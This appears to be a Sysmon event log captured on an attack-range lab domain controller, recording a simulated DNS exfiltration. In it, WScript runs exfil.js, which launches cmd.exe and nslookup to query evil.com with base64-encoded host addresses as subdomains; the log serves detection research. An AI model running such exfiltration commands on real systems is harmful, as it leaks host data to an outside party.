10341000x8000000000000000217674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.959{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.943{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.943{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.943{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-2247-000000005F02}6076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.943{2E1864BB-1905-629A-2047-000000005F02}71967552C:\Windows\system32\cmd.exe{2E1864BB-1905-629A-2247-000000005F02}6076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.956{2E1864BB-1905-629A-2247-000000005F02}6076C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1905-629A-2047-000000005F02}7196C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhmlq.tmp 2>&1 10341000x8000000000000000217668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.928{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-2147-000000005F02}6124C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.928{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-2147-000000005F02}6124C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.928{2E1864BB-1905-629A-2147-000000005F02}61247888C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-2047-000000005F02}7196C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.928{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-2147-000000005F02}6124C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.912{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.912{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.912{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.912{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.912{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-2047-000000005F02}7196C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.912{2E1864BB-18E0-629A-6742-000000005F02}39766676C:\Windows\System32\WScript.exe{2E1864BB-1905-629A-2047-000000005F02}7196C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.917{2E1864BB-1905-629A-2047-000000005F02}7196C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhmlq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.912{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbcl.tmpMD5=E9933BFC1563034EF92711FFD1FA59E4,SHA256=B289486696E542D49274648AF69BCDC051FA9206A6157EC32F57F8442A56EBEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.875{2E1864BB-1905-629A-1E47-000000005F02}45801800C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-1F47-000000005F02}2928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.875{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.875{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.875{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.875{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.875{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-1F47-000000005F02}2928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.875{2E1864BB-1905-629A-1D47-000000005F02}58607464C:\Windows\system32\cmd.exe{2E1864BB-1905-629A-1F47-000000005F02}2928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.884{2E1864BB-1905-629A-1F47-000000005F02}2928C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1905-629A-1D47-000000005F02}5860C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbcl.tmp 2>&1 10341000x8000000000000000217648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.859{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-1E47-000000005F02}4580C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.859{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-1E47-000000005F02}4580C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.859{2E1864BB-1905-629A-1E47-000000005F02}45801800C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-1D47-000000005F02}5860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.844{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-1E47-000000005F02}4580C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+